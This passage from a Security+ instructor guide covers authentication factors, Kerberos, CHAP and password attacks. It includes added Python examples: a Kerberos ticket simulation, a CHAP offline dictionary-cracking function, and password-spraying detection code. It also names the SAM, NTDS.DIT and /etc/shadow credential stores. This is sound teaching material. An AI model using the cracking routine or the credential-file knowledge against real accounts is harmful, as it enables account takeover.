glossary term.

Assuming that an account has been created securely (the identity of the account holder
has been verified), authentication verifies that only the account holder is able to use
the account, and that the system may only be used by account holders. Authentication
is performed when the account holder supplies the appropriate credentials (or
authenticators) to the system. These are compared to the credentials stored on the
system. If they match, the account is authenticated.

There are many different technologies for defining credentials, and they can be
categorized as factors.

Something You Know Authentication

The typical knowledge factor is the logon, composed of a username and a password.
The username is typically not a secret (although it should not be published openly),
but the password must be known only to the account holder. A passphrase is a longer
password composed of several words. This has the advantages of being more secure
and easier to remember. A personal identification number (PIN) is also something
you know, although long PIN codes are hard to remember, and short codes are
too vulnerable for most authentication systems. Swipe patterns are often used for
authentication to touch-based devices.

Windows sign-in screen. (Screenshot used with permission from Microsoft.)

A knowledge factor is also used for account reset mechanisms. For example, to reset
the password on an account, the user might have to respond to a challenge question,
such as, "What is your favorite movie?"

Something You Have Authentication

An ownership factor means that the account holder possesses something that no one
else does, such as a smart card, fob, or wristband programmed with a unique identity
certificate or account number. Alternatively, they might have a fob that generates
a unique code. These ownership factors can be described as hard tokens.
A device such as a smartphone can also be used to receive a uniquely generated
access code as a soft token. Unlike a password, these tokens are valid for only one use,
typically within a brief time window.

Something You Are/Do Authentication

A biometric factor uses either physiological identifiers, such as a fingerprint, or
behavioral identifiers, such as the way someone moves (gait). The identifiers are
scanned and recorded as a template. When the user authenticates, another scan is
taken and compared to the template.

Authentication Design

Show Slide(s): Authentication Design

Authentication design refers to selecting a technology that meets requirements for
confidentiality, integrity, and availability:
• Confidentiality, in terms of authentication, is critical, because if account credentials
are leaked, threat actors can impersonate the account holder and act on the system
with whatever rights they have.

• Integrity means that the authentication mechanism is reliable and not easy for
threat actors to bypass or trick with counterfeit credentials.

• Availability means that the time taken to authenticate does not impede workflows
and is easy enough for users to operate.

Authentication is used in different contexts, and factors are not always well suited
to a context. For example, you might authenticate to a PC by inputting a password
to get access to the device. This might also authenticate you to a network. But
authentication is also used for physical security. If you consider numerous employees
arriving for work, asking them to type a password to gain access to the building
would take too long and cause huge disruption (lack of availability). It is also highly
likely that passwords would be observed (lack of confidentiality). Finally, it is likely
that users would simply start holding the door open for each other (lack of integrity).
Authentication design tries to anticipate these issues and implements a technology that
fits the use case.

Multifactor Authentication

Show Slide(s): Multifactor Authentication

Teaching Tip: We will introduce the concept later, but you might want to mention
2-step verification here, to contrast with MFA.

An authentication technology is considered strong if it combines the use of more than
one type of knowledge, ownership, and biometric factor, and is called multifactor
authentication (MFA). Single-factor authentication can quite easily be compromised: a
password could be written down or shared, a smart card could be lost or stolen, and a
biometric system could be subject to high error rates or spoofing.

Two-Factor Authentication (2FA) combines either an ownership-based smart card or
biometric identifier with something you know, such as a password or PIN. Three-factor
authentication combines all three technologies, or incorporates an additional attribute,
such as location; for example, a smart card with integrated fingerprint reader. This
means that to authenticate, the user must possess the card, the user's fingerprint must
match the template stored on the card, and the user must input a PIN or password.

Multifactor authentication requires a combination of different technologies. For example,
requiring a PIN along with date of birth may be stronger than entering a PIN alone, but it is
not multifactor.


Authentication Attributes

Show Slide(s): Authentication Attributes

Teaching Tip: Attributes can be distinguished from factors as information that is not
unique or that is not reliable/fast enough to use as a primary authentication
mechanism. Attributes can be used for secondary or continuous authentication/access
control mechanisms.

Compared to the three main authentication factors, an authentication attribute is
either a non-unique property or a factor that cannot be used independently.

Somewhere You Are Authentication

Location-based authentication measures some statistic about where you are. This
could be a geographic location, measured using a device's location service, or it could
be by IP address. A device's IP address could be used to refer to a logical network
segment, or it could be linked to a geographic location using a geolocation service.
Within a premises network, the physical port location, virtual LAN (VLAN), or Wi-Fi
network can also be made the basis of location-based authentication.

Location-based authentication is not used as a primary authentication factor, but
it may be used as a continuous authentication mechanism or as an access control
feature. For example, if a user enters the correct credentials at a VPN gateway but his
or her IP address shows him/her to be in a different country than expected, access
controls might be applied to restrict the privileges granted or refuse access completely.
Another example is where a user appears to log in from different geographic locations
that travel time would make physically impossible.

Something You Can Do Authentication

Behavioral characteristics, such as the way you walk or the way you hold your
smartphone, can uniquely identify you to a considerable degree of certainty. Although
this factor is impractical to use for primary authentication, it can be used for contextual
and continual authentication to ensure that a device continues to be operated by the
owner.

Something You Exhibit Authentication

Something you exhibit also refers to behavioral-based authentication and authorization,
with specific emphasis on personality traits. For example, the way you use smartphone
apps or web search engines might conform to a pattern of behavior that can be
captured by machine learning analysis as a statistical template. If someone else uses
the device, their behavior will be different, and this anomalous pattern could be used
to lock the device and require re-authentication.

Someone You Know Authentication

A someone you know authentication scheme uses a web of trust model, where new
users are vouched for by existing users. As the user participates in the network, their
identity becomes better established. One example is the decentralized web of trust
model, used by Pretty Good Privacy as an alternative to PKI (weboftrust.info/
index.html).


Review Activity:
Authentication Design Concepts
Answer the following questions:

1. What is the difference between authorization and authentication?

Authorization means granting the account that has been configured for the user on
the computer system the right to make use of a resource. Authorization manages
the privileges granted on the resource. Authentication protects the validity of the user
account by testing that the person accessing that account is who she/he says she/he is.

2. What steps should be taken to enroll a new employee on a domain network?

Perform checks to confirm the user's identity, issue authentication credentials securely,
assign appropriate permissions/privileges to the account, and ensure accounting
mechanisms to audit the user's activity.

3. True or False? An account requiring a password, PIN, and smart card is an
example of three-factor authentication.

False. Three-factor authentication also includes a biometric-, behavioral-, or location-
based element. The password and PIN elements are the same factor (something
you know).

4. What methods can be used to implement location-based authentication?

You can query the location service running on a device or geolocation by IP. You could
use location with the network, based on switch port, wireless network name, virtual
LAN (VLAN), or IP subnet.


Topic 7B
Implement Knowledge-Based
Authentication

EXAM OBJECTIVES COVERED

1.2 Given a scenario, analyze potential indicators to determine the type of attack
3.8 Given a scenario, implement authentication and authorization solutions
4.1 Given a scenario, use the appropriate tool to assess organizational security (password
crackers only)

Teaching Tip: This topic focuses on the implementation of knowledge factor
mechanisms, including attacks on password credentials.

Knowledge-based authentication refers primarily to issuing users with password-based
account access mechanisms. Configuring password-based authentication protocols
and supporting users with authentication issues is an important part of the information
security role. In this topic, you will learn how some common authentication protocols
work and about the ways that they can be put at risk by password cracking techniques.

Local, Network, and Remote Authentication

Show Slide(s): Local, Network, and Remote Authentication

Teaching Tip: The syllabus does not mention local authentication specifically, although
PAM is in the acronyms list. It is wise to check that students grasp the basics.

One of the most important features of an operating system is the authentication
provider, which is the software architecture and code that underpins the mechanism
by which the user is authenticated before starting a shell. This is usually described
as a login (Linux) or a logon or sign-in (Microsoft). Knowledge-based authentication,
using a password or personal identification number (PIN), is the default authentication
provider for most operating systems.

Knowledge-based authentication relies on cryptographic hashes. A plaintext password
is not usually transmitted or stored in a credential database because of the risk of
compromise. Instead, the password is stored as a cryptographic hash. When a user
enters a password to log in, an authenticator converts what is typed into a hash and
transmits that to an authority. The authority compares the submitted hash to the one
in the database and authenticates the subject only if they match.

Windows Authentication
Windows authentication involves a complex architecture of components (docs.
microsoft.com/en-us/windows-server/security/windows-authentication/credentials-
processes-in-windows-authentication), but the following three scenarios are typical:
• Windows local sign-in: the Local Security Authority (LSA) compares the submitted
credential to a hash stored in the Security Accounts Manager (SAM) database, which
is part of the registry. This is also referred to as interactive logon.

• Windows network sign-in: the LSA can pass the credentials for authentication to
a network service. The preferred system for network authentication is based on
Kerberos, but legacy network applications might use NT LAN Manager (NTLM)
authentication.

• Remote sign-in: if the user's device is not connected to the local network,
authentication can take place over some type of virtual private network (VPN) or
web portal.


Linux Authentication
In Linux, local user account names are stored in /etc/passwd. When a user logs
in to a local interactive shell, the password is checked against a hash stored in /etc/
shadow. Interactive login over a network is typically accomplished using Secure Shell
(SSH). With SSH, the user can be authenticated using cryptographic keys instead of a
password.
A pluggable authentication module (PAM) is a package for enabling different
authentication providers, such as smart-card login (tecmint.com/configure-pam-
in-centos-ubuntu-linux). The PAM framework can also be used to implement
authentication to network servers.

Single Sign-On (SSO)

A single sign-on (SSO) system allows the user to authenticate once to a local device
and be authenticated to compatible application servers without having to enter
credentials again. In Windows, SSO is provided by the Kerberos framework.

Kerberos Authentication

Show Slide(s): Kerberos Authentication

Teaching Tip: Kerberos can be difficult to follow, with multiple use of secret and
session keys from different sources. Stress the main point that Kerberos provides
single sign-on through the use of tickets or tokens. Note the use of time stamping to
defeat replay attacks and the use of symmetric, rather than asymmetric, encryption
(i.e., contrast Kerberos with PKI).

Kerberos is a single sign-on network authentication and authorization protocol used
on many networks, notably as implemented by Microsoft's Active Directory (AD)
service. Kerberos was named after the three-headed guard dog of Hades (Cerberus)
because it consists of three parts. Clients request services from application servers,
which both rely on an intermediary (a Key Distribution Center (KDC)) to vouch for
their identity. There are two services that make up a KDC: the Authentication Service
and the Ticket Granting Service. The KDC runs on port 88 using TCP or UDP.

Kerberos Authentication Service. (Images © 123RF.com.)

Teaching Tip: The server can decrypt the request because it holds a copy of the
user's password hash. This shows that the user has entered the correct password and
that the system time is valid.

The Authentication Service is responsible for authenticating user logon requests. More
generally, users and services can be authenticated; these are collectively referred to
as principals. For example, when you sit at a Windows domain workstation and log
on to a realm (or domain), the first step of logon is to authenticate with a KDC server,
implemented as a domain controller.

1. The client sends the authentication service (AS) a request for a Ticket Granting
Ticket (TGT). This is composed by encrypting the date and time on the local
computer with the user's password hash as the key.

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
156 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

The password hash itself is not transmitted over the network. Also, although we refer to passwords for simplicity, the system can use other authentication providers, such as smart-card logon.

The Ticket Granting Ticket (TGT or user ticket) is time-stamped (under Windows, they have a default maximum age of 10 hours). This means that workstations and servers on the network must be synchronized (to within five minutes) or a ticket will be rejected. This helps prevent replay attacks.

2. The AS checks that the user account is present, that it can decode the request by matching the user's password hash with the one in the Active Directory database, and that the request has not expired. If the request is valid, the AS responds with the following data:

• Ticket Granting Ticket (TGT): this contains information about the client (name and IP address) plus a timestamp and validity period. This is encrypted using the KDC's secret key.

• TGS session key: for use in communications between the client and the Ticket Granting Service (TGS). This is encrypted using a hash of the user's password.

The TGT is an example of a logical token. All the TGT does is identify who you are and confirm that you have been authenticated; it does not provide you with access to any domain resources.

Because the TGS session key is encrypted under a key derived from the password, anyone who captures the AS exchange (or who can request an AS reply for an account with pre-authentication disabled) can try candidate passwords against it offline. Kerberos therefore does not remove the need for strong account passwords.

Kerberos Authorization

Show Slide(s): Kerberos Authorization

Presuming the user entered the correct password, the client can decrypt the Ticket Granting Service (TGS) session key but not the TGT. This establishes that the client and KDC know the same shared secret and that the client cannot interfere with the TGT.

Teaching Tip: The client does not know the application server's password and vice versa. Only the KDC knows both passwords.

1. To access resources within the domain, the client requests a Service Ticket (a token that grants access to a target application server). This process of granting service tickets is handled by the TGS.

2. The client sends the TGS a copy of its TGT and the name of the application server it wishes to access, plus an authenticator, consisting of a time-stamped client ID encrypted using the TGS session key.

The TGS should be able to decrypt both messages (using the KDC's secret key for the first and the TGS session key for the second). This confirms that the request is genuine. It also checks that the ticket has not expired and has not been used before (replay attack).

3. The TGS service responds with:

• Service session key: for use between the client and the application server. This is encrypted with the TGS session key.

• Service ticket: containing information about the user, such as a timestamp, system IP address, Security Identifier (SID) and the SIDs of groups to which he or she belongs, and the service session key. This is encrypted using the application server's secret key.

4. The client forwards the service ticket, which it cannot decrypt, to the application server and adds another time-stamped authenticator, which is encrypted using the service session key.

Kerberos Ticket Granting Service. (Images © 123RF.com.)

5. The application server decrypts the service ticket to obtain the service session key using its secret key, confirming that the client has sent it an untampered message. It then decrypts the authenticator using the service session key.

6. Optionally, the application server responds to the client with the timestamp used in the authenticator, which is encrypted by using the service session key. The client decrypts the timestamp and verifies that it matches the value already sent, and concludes that the application server is trustworthy.

This means that the server is authenticated to the client (referred to as mutual authentication). This prevents a man-in-the-middle attack, where a malicious user could intercept communications between the client and server.

7. The server now responds to client requests (assuming they conform to the server's access control list).

The data transfer itself is not encrypted (at least as part of Kerberos; some sort of transport encryption can be deployed).

One of the noted drawbacks of Kerberos is that the KDC represents a single point of failure for the network. In practice, backup KDC servers can be implemented (for example, Active Directory supports multiple domain controllers, each of which is running the KDC service).
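The three exchanges above (AS, TGS, and application server), worked through as an added example that is not part of the original guide: a Python simulation of the ticket flow with every check the text describes. It assumes a toy authenticated-encryption routine (seal/unseal, built from HMAC-SHA256) standing in for the AES encryption types a real KDC uses, SHA-256 of the password standing in for the NT hash, and constructed principal names (alice, cifs/files.example.com, 10.0.0.5). The KDC holds every long-term key, the application server holds only its own, the client never sees inside a ticket, and the five-minute skew window and replay cache reject stale or reused authenticators.

```python
import hashlib, hmac, json, os, time

SKEW_SECONDS = 300        # five-minute clock tolerance described in the text
TGT_LIFETIME = 10 * 3600  # Windows' default TGT maximum age described in the text

def _keystream(key, nonce, length):
    blocks = (hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest() for i in range(length // 32 + 1))
    return b"".join(blocks)[:length]

def seal(key, obj):
    """Toy authenticated encryption (HMAC-SHA256 keystream + HMAC tag): stand-in for the AES types a real KDC uses."""
    nonce, pt = os.urandom(16), json.dumps(obj, sort_keys=True).encode()
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("integrity check failed: wrong key or tampered message")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

def password_key(password):
    return hashlib.sha256(password.encode()).digest()  # stand-in for the NT hash / string-to-key

def check_fresh(timestamp, now, seen, principal):
    """Reject authenticators outside the clock-skew window or already used (replay)."""
    if abs(now - timestamp) > SKEW_SECONDS:
        raise ValueError("authenticator outside permitted clock skew")
    if (principal, timestamp) in seen:
        raise ValueError("replayed authenticator")
    seen.add((principal, timestamp))

class KDC:
    def __init__(self):
        self.kdc_key = os.urandom(32)  # the KDC's own secret; never leaves the KDC
        self.principals = {}           # name -> long-term key; only the KDC knows all of them
        self.seen = set()
    def as_exchange(self, user, sealed_request, now):
        """Authentication steps 1-2: open the time-stamped request, issue TGT + TGS session key."""
        user_key = self.principals[user]
        req = unseal(user_key, sealed_request)  # fails if the user typed the wrong password
        check_fresh(req["timestamp"], now, self.seen, ("as", user))
        tgs_key = os.urandom(32)
        tgt = seal(self.kdc_key, {"client": user, "addr": req["addr"], "expires": now + TGT_LIFETIME,
                                  "session_key": tgs_key.hex()})
        return tgt, seal(user_key, {"tgs_session_key": tgs_key.hex()})
    def tgs_exchange(self, tgt, service, authenticator, now):
        """Authorization steps 2-3: validate TGT + authenticator, issue service ticket + session key."""
        t = unseal(self.kdc_key, tgt)  # the client can neither read nor forge this
        if now > t["expires"]:
            raise ValueError("TGT expired")
        tgs_key = bytes.fromhex(t["session_key"])
        auth = unseal(tgs_key, authenticator)
        if auth["client"] != t["client"]:
            raise ValueError("authenticator does not match ticket")
        check_fresh(auth["timestamp"], now, self.seen, ("tgs", auth["client"]))
        svc_key = os.urandom(32)
        ticket = seal(self.principals[service], {"client": t["client"], "addr": t["addr"],
                                                 "expires": now + TGT_LIFETIME, "session_key": svc_key.hex()})
        return ticket, seal(tgs_key, {"service_session_key": svc_key.hex()})

class AppServer:
    def __init__(self, key):
        self.key, self.seen = key, set()  # knows only its own secret, never the user's
    def ap_exchange(self, ticket, authenticator, now):
        """Steps 4-6: open the ticket, check the authenticator, prove the server's identity back."""
        t = unseal(self.key, ticket)
        svc_key = bytes.fromhex(t["session_key"])
        auth = unseal(svc_key, authenticator)
        if auth["client"] != t["client"]:
            raise ValueError("authenticator does not match ticket")
        check_fresh(auth["timestamp"], now, self.seen, auth["client"])
        return seal(svc_key, {"timestamp": auth["timestamp"]})  # mutual authentication reply

def client_logon(kdc, server, user, password, service, now):
    """Client side of all three exchanges; returns (mutual_auth_ok, ticket, authenticator)."""
    ukey = password_key(password)
    tgt, blob = kdc.as_exchange(user, seal(ukey, {"timestamp": now, "addr": "10.0.0.5"}), now)
    tgs_key = bytes.fromhex(unseal(ukey, blob)["tgs_session_key"])
    ticket, blob = kdc.tgs_exchange(tgt, service, seal(tgs_key, {"client": user, "timestamp": now}), now)
    svc_key = bytes.fromhex(unseal(tgs_key, blob)["service_session_key"])
    authenticator = seal(svc_key, {"client": user, "timestamp": now})
    reply = server.ap_exchange(ticket, authenticator, now)
    return unseal(svc_key, reply)["timestamp"] == now, ticket, authenticator

def demo():
    """Constructed scenario (one user, one file service); returns the outcome of each attempt."""
    now, kdc, svc = int(time.time()), KDC(), "cifs/files.example.com"
    kdc.principals["alice"] = password_key("correct horse battery staple")
    kdc.principals[svc] = os.urandom(32)
    server = AppServer(kdc.principals[svc])
    ok, ticket, auth = client_logon(kdc, server, "alice", "correct horse battery staple", svc, now)
    out = {"logon": ok}
    attempts = {"bad_password": lambda: client_logon(kdc, server, "alice", "wrong", svc, now + 1),
                "replayed_authenticator": lambda: server.ap_exchange(ticket, auth, now + 1),
                "stale_authenticator": lambda: server.ap_exchange(ticket, auth, now + 3600)}
    for label, attempt in attempts.items():
        try:
            attempt()
            out[label] = "accepted"
        except ValueError as err:
            out[label] = str(err)
    return out
```

Running demo() shows a successful mutual authentication, a wrong password failing at the KDC without anything password-like crossing the wire, and the same ticket and authenticator being refused when replayed or presented outside the skew window. Note what the application server never learns: the user's password, the user's key, or the KDC's key.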
PAP, CHAP, and MS-CHAP Authentication

Show Slide(s): PAP, CHAP, and MS-CHAP Authentication

Teaching Tip: Even though there aren't too many scenarios where either CHAP or PAP are chosen these days, remind students that some exam questions might not reflect the legacy nature of some technologies. These protocols can be deployed more or less securely within an encrypted tunnel (TLS or IPsec, for instance). The idea here is that you use PKI certificates for machine authentication, then perform user authentication through the secure tunnel. See the topic on EAP.

Kerberos is designed to work over a trusted local network. Several authentication protocols have been developed to work with remote access protocols, where the connection is made over a serial link or virtual private network (VPN).

Password Authentication Protocol (PAP)

The Password Authentication Protocol (PAP) is an unsophisticated authentication method developed as part of the Point-to-Point Protocol (PPP), used to transfer TCP/IP data over serial or dial-up connections. It relies on clear text password exchange (HTTP basic authentication has the same weakness) and is therefore obsolete for most purposes, except through an encrypted tunnel.

Challenge Handshake Authentication Protocol (CHAP)

The Challenge Handshake Authentication Protocol (CHAP) was also developed as part of PPP as a means of authenticating users over a remote link. CHAP relies on a challenge that the client answers with a hash (not an encryption) of the challenge and the shared secret, in a system called a three-way handshake.

1. Challenge: the server challenges the client, sending a randomly generated challenge message.

2. Response: the client responds with a hash calculated from the server challenge message and client password (or other shared secret).

3. Verification: the server performs its own hash using the secret it stores for the client. If it matches the response, then access is granted; otherwise, the connection is dropped. Note that standard CHAP (RFC 1994) requires the server to hold the secret in plaintext, because it must recompute the hash itself.

The handshake is repeated with a different challenge message periodically during the connection (although transparent to the user). This guards against replay attacks, in which a previous session could be captured and reused to gain access. It does not guard against offline guessing: a captured challenge and response let an attacker test candidate secrets at leisure.

MS-CHAPv2 is Microsoft's implementation of CHAP. Because of the way it uses vulnerable NTLM hashes, MS-CHAP should not be deployed without the protection of a secure connection tunnel so that the credentials being passed are encrypted.
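The three-way handshake above, as an added example that is not part of the original guide: a Python implementation of RFC 1994 CHAP with MD5 (Response = MD5(Identifier || Secret || Challenge)), an authenticator that issues a fresh challenge each time and will only accept a response to the outstanding one, and the offline attack a packet sniffer enables, which the Offline Attacks section below also describes. Peer name, secret, and the tiny word list are constructed.

```python
import hashlib
import hmac
import os


def chap_response(identifier, secret, challenge):
    """RFC 1994 CHAP with MD5: Response = MD5(Identifier || Secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapAuthenticator:
    """Server side. RFC 1994 requires the secret in plaintext: the server recomputes the
    response itself, which is why standard CHAP cannot work from a stored password hash."""

    def __init__(self, secrets):
        self.secrets = secrets       # peer name -> plaintext shared secret
        self.identifier = 0
        self.pending = {}            # peer name -> (identifier, challenge) awaiting a response

    def challenge(self, peer):
        self.identifier = (self.identifier + 1) % 256
        chal = os.urandom(16)        # fresh random value each time, including periodic re-challenges
        self.pending[peer] = (self.identifier, chal)
        return self.identifier, chal

    def verify(self, peer, identifier, response):
        ident, chal = self.pending.pop(peer, (None, None))   # a challenge is usable exactly once
        if chal is None or ident != identifier:
            return False
        expected = chap_response(identifier, self.secrets[peer], chal)
        return hmac.compare_digest(expected, response)


def offline_crack(identifier, challenge, response, wordlist):
    """What an attacker does with a sniffed exchange: test candidate secrets without touching the server."""
    for candidate in wordlist:
        if chap_response(identifier, candidate, challenge) == response:
            return candidate
    return None


def demo():
    """Constructed scenario: a genuine logon, a replayed response, a wrong secret, and an offline crack."""
    server = ChapAuthenticator({b"alice": b"s3cret"})
    out = {}
    ident, chal = server.challenge(b"alice")
    captured = chap_response(ident, b"s3cret", chal)          # what a sniffer on the link sees
    out["genuine"] = server.verify(b"alice", ident, captured)
    ident2, _ = server.challenge(b"alice")                    # periodic re-challenge
    out["replayed_response"] = server.verify(b"alice", ident2, captured)
    ident3, chal3 = server.challenge(b"alice")
    out["wrong_secret"] = server.verify(b"alice", ident3, chap_response(ident3, b"guess", chal3))
    out["cracked_offline"] = offline_crack(ident, chal, captured, [b"password", b"letmein", b"s3cret"])
    return out
```

The replay fails because the second challenge is different, exactly as the text says; the offline crack succeeds because nothing in the handshake slows down guessing, which is why CHAP and MS-CHAP belong inside a tunnel.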

Defining allowed authentication mechanisms on a Windows VPN. (Screenshot used with permission from Microsoft.)

Lesson 7: Implementing Authentication Controls | Topic 7B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 159

Password Attacks

Show Slide(s): Password Attacks

When a user chooses a password, the password is converted to a hash using a cryptographic function, such as MD5 or SHA-256 (or, better, a deliberately slow key-derivation function such as PBKDF2 or bcrypt). This means that, in theory, no one except the user (not even the system administrator) knows the password, because the plaintext should not be recoverable from the hash.

Teaching Tip: The best defense against password crackers is to ensure the use of strong passwords (and not to use clear text protocols, of course). You must also restrict access to password databases carefully to try to prevent any sort of eavesdropper from running on your networks.

Plaintext/Unencrypted Attacks

A plaintext/unencrypted attack exploits password storage or a network authentication protocol that does not use encryption. Examples include PAP, basic HTTP/FTP authentication, and Telnet. These protocols must not be used. Passwords must never be saved to an unmanaged file. One common source of credential breaches is passwords embedded in application code that has subsequently been uploaded to a public repository.

Online Attacks

An online password attack is where the threat actor interacts with the authentication service directly: a web login form or VPN gateway, for instance. The attacker submits passwords using either a database of known passwords (and variations) or a list of passwords that have been cracked offline.

Also, be aware that there are databases of username and password/password hash combinations for multiple accounts stored across the Internet. These details derive from successful hacks of various companies' systems. These databases can be searched using a site such as haveibeenpwned.com.

An online password attack can show up in audit logs as repeatedly failed logons and then a successful logon, or as successful logon attempts at unusual times or locations. Apart from ensuring the use of strong passwords by users, online password attacks can be mitigated by restricting the number or rate of logon attempts, and by shunning logon attempts from known bad IP addresses.

Note that restricting logons can be turned into a vulnerability as it exposes the account to denial of service attacks. The attacker keeps trying to authenticate, locking out valid users.

Password Spraying

Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames. Because each account receives only one or two failures, per-account lockout thresholds are never reached; detection has to look at the number of distinct accounts a single source is failing against.
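The two log patterns described above (a run of failures followed by success on one account, and one source spraying many accounts), as an added example that is not part of the original guide: Python detection logic run over a constructed authentication log. The log format, the source addresses (documentation ranges) and the thresholds are all assumptions; real logs would be Windows event 4625/4624 or VPN/IdP audit records with the same fields.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from any real system): a spray from 203.0.113.9 across many
# accounts, a noisy credential-stuffing run against alice, and one ordinary typo from the LAN.
SAMPLE_LOG = """
2024-05-02T08:50:10Z src=10.0.0.12 user=alice result=FAIL
2024-05-02T08:50:25Z src=10.0.0.12 user=alice result=OK
2024-05-02T09:00:01Z src=203.0.113.9 user=bob result=FAIL
2024-05-02T09:00:03Z src=203.0.113.9 user=carol result=FAIL
2024-05-02T09:00:05Z src=203.0.113.9 user=dave result=FAIL
2024-05-02T09:00:07Z src=203.0.113.9 user=erin result=FAIL
2024-05-02T09:00:09Z src=203.0.113.9 user=frank result=FAIL
2024-05-02T09:00:11Z src=203.0.113.9 user=grace result=OK
2024-05-02T09:10:00Z src=198.51.100.7 user=alice result=FAIL
2024-05-02T09:10:20Z src=198.51.100.7 user=alice result=FAIL
2024-05-02T09:10:40Z src=198.51.100.7 user=alice result=FAIL
2024-05-02T09:11:00Z src=198.51.100.7 user=alice result=FAIL
2024-05-02T09:11:20Z src=198.51.100.7 user=alice result=OK
this line is malformed and must be skipped, not crash the parser
"""

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse(text):
    """Parse the constructed format into events sorted by time; unparseable lines are dropped."""
    events = []
    for line in text.strip().splitlines():
        m = LINE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                           "src": m["src"], "user": m["user"], "ok": m["result"] == "OK"})
    return sorted(events, key=lambda e: e["ts"])


def detect_spraying(events, window=timedelta(minutes=30), min_users=5):
    """Horizontal pattern: one source failing against many distinct accounts inside a window.
    Per-account lockout counters never fire here because each account sees one failure."""
    failures = defaultdict(list)
    for e in events:
        if not e["ok"]:
            failures[e["src"]].append(e)
    hits = {}
    for src, evs in failures.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if len(users) >= min_users:
                hits[src] = max(hits.get(src, 0), len(users))
    return hits


def detect_fail_then_success(events, min_failures=3):
    """Vertical pattern: a run of failures on one account followed by a success."""
    streak, hits = defaultdict(int), []
    for e in events:
        if e["ok"]:
            if streak[e["user"]] >= min_failures:
                hits.append((e["user"], e["src"], streak[e["user"]]))
            streak[e["user"]] = 0
        else:
            streak[e["user"]] += 1
    return hits


def analyze(text):
    events = parse(text)
    spraying = detect_spraying(events)
    return {"spraying": spraying,
            "spray_successes": [(e["src"], e["user"]) for e in events if e["ok"] and e["src"] in spraying],
            "fail_then_success": detect_fail_then_success(events)}
```

analyze(SAMPLE_LOG) flags 203.0.113.9 as a spraying source and reports that one of its guesses (grace) succeeded, flags the four-failures-then-success run against alice, and ignores the single typo from 10.0.0.12. A per-account lockout rule alone would have caught only the alice case.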
Offline Attacks

An offline attack means that the attacker has managed to obtain a database of password hashes, such as %SystemRoot%\System32\config\SAM, %SystemRoot%\NTDS\NTDS.DIT (the Active Directory credential store), or /etc/shadow. Once the password database has been obtained, the cracker does not interact with the authentication system. The only indicator of this type of attack (other than misuse of the account in the event of a successful attack) is a file system audit log that records the malicious account accessing one of these files. Threat actors can also read credentials from host memory, in which case the only reliable indicator might be the presence of attack tools on a host.

If the attacker cannot obtain a database of passwords, a packet sniffer might be used to obtain the client response to a server challenge in a protocol such as NTLM or CHAP/MS-CHAP. Although these protocols avoid sending the hash of the password directly, the response is derived from it in some way. Password crackers can exploit weaknesses in a protocol to calculate the hash and match it to a dictionary word or brute force it.

Brute-Force and Dictionary Attacks

Show Slide(s): Brute-Force and Dictionary Attacks

Some password attacks exploit the weak credentials chosen by users. Others can exploit vulnerabilities in the storage mechanism. For example, the Windows SAM database can be configured to store hashes for compatibility with older versions (LM and NTLMv1 hashes). These legacy hashes are cryptographically weak and highly vulnerable to password cracking (ldapwiki.com/wiki/LM hash).

Teaching Tip: You might want to note the use of machine learning to facilitate brute-force attacks (darkreading.com/analytics/passgan-password-cracking-using-machine-learning).

Interaction Opportunity: You can direct students to a brute-force calculator to test a few passwords (grc.com/haystack.htm, for example).

Brute-Force Attack

A brute-force attack attempts every possible combination of characters in the password space in order to match a captured hash and recover the plaintext that generated it. The size of the hash output is fixed by the algorithm (128-bit MD5 or 256-bit SHA-256, for instance), but in practice the limiting factor is the number of characters and the character set used in the plaintext password: the longer the password, the more candidates must be hashed and tested to find a match. Brute-force attacks are heavily constrained by time and computing resources, and are therefore most effective at cracking short passwords. However, brute-force attacks distributed across multiple hardware components, like a cluster of high-end graphics cards, can be successful at cracking longer passwords.

Dictionary and Rainbow Table Attacks

A dictionary attack can be used where there is a good chance of guessing the likely value of the plaintext, such as a non-complex password. The software generates hash values from a dictionary of plaintexts to try to match one to a captured hash. Rainbow table attacks refine the dictionary approach. The attacker uses a precomputed lookup table of all possible passwords and their matching hashes. Not all possible hash values are stored, as this would require too much memory. Values are computed in chains, and only the first and last values need to be stored. The hash value of a stored password can then be looked up in the table and the corresponding plaintext discovered.

Using a salt to add a random value to the stored plaintext helps to slow down rainbow table attacks, because the tables cannot be created in advance and must be recreated for each combination of password and salt value. Rainbow tables are also impractical when trying to discover long passwords (more than about 14 characters). UNIX and Linux password storage mechanisms use salt, but Windows does not (NT hashes in the SAM and in NTDS.DIT are unsalted). Consequently, in a Windows environment, it is even more important to enforce strong password policies.

Hybrid Attack

A hybrid password attack uses a combination of dictionary and brute-force attacks. It is principally targeted against naive passwords with inadequate complexity, such as james1. The password cracking algorithm tests dictionary words and names in combination with a mask that limits the number of variations to test for, such as adding numeric prefixes and/or suffixes. Other types of algorithms can be applied, based on what hackers know about how users behave when forced to select complex passwords that they don't really want to make hard to remember. Other examples might include substituting s with $ or o with 0.
